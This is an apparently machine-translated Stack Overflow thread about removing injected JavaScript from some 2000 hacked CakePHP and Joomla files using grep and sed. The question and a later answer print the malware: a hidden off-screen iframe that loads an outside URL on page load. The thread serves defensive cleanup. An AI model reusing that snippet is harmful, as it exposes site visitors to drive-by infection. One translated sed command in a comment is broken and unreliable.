需要使用linux命令删除cakephp脚本中的病毒代码答案

【问题标题】：Need to delete the virus code in cakephp script using the linux command需要使用linux命令删除cakephp脚本中的病毒代码
【发布时间】：2012-10-11 20:41:17
【问题描述】：

昨天我的网站被黑了，代码如下：

<script>  
    function frmAdd() { 
        var ifrm = document.createElement('iframe'); 
        ifrm.style.position='absolute'; 
        ifrm.style.top='-999em'; 
        ifrm.style.left='-999em'; 
        ifrm.src = \"http://fenwaywest.com/media/index.php\";
        ifrm.id = 'frmId';
        document.body.appendChild(ifrm);
    };
    window.onload = frmAdd;
</script>";

当我使用以下命令搜索服务器以查找受影响的文件时

grep -r "<script>  function frmAdd()" /path/

我有超过 2000 个文件。

现在我只需要删除该行。请问，有人可以指导该命令仅删除所有 2000 个文件中的该行吗？

【问题讨论】：

标签： linux cakephp grep virus

【解决方案1】：

先备份！然后，你可以试试这样：

grep -lr " function frmAdd" /path/ | xargs sed -i '/ function frmAdd/d'

这将删除任何与该正则表达式匹配的行。它还假设路径不包含空格（希望这里是一个合理的假设）。

【讨论】：

真棒比你这么多的帮助。它节省了我一整天的时间。

【解决方案2】：

在打印用户数据时尝试使用 CakePHP sanitize Class：

echo Sanitize::html($badString);

【讨论】：

我不确定你的意思是什么？如果我使用这条线会发生什么
我不懂 PHP，但我认为 @aarkerio 建议这样做是为了防止 XSS 攻击。

【解决方案3】：

你在清除病毒方面有什么不足吗？因为我感染了同样的病毒。我的网站在 joomla 中。

编辑：

我使用代码：

grep -lr " function frmAdd" public_html | xargs sed -i '/ function frmAdd/d'

但是如果你有这样的东西

    <html><body bgcolor="#FFFFFF"><!--ef09d2--><script>  function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://fenwaywest.com/media/index.php";ifrm.id = 'frmId';document.body.appendChild(ifrm);};window.onload = frmAdd;</script><!--/ef09d2-->
</body></html>

这将只返回</body></html>

【讨论】：

您好，您只需使用相同的命令删除所有 joomla 文件中的此病毒行 grep -lr " function frmAdd" /scriptpath/ | xargs sed -i '/函数frmAdd/d'
是的，但我担心病毒会再次出现。谷歌将我的网站列入黑名单。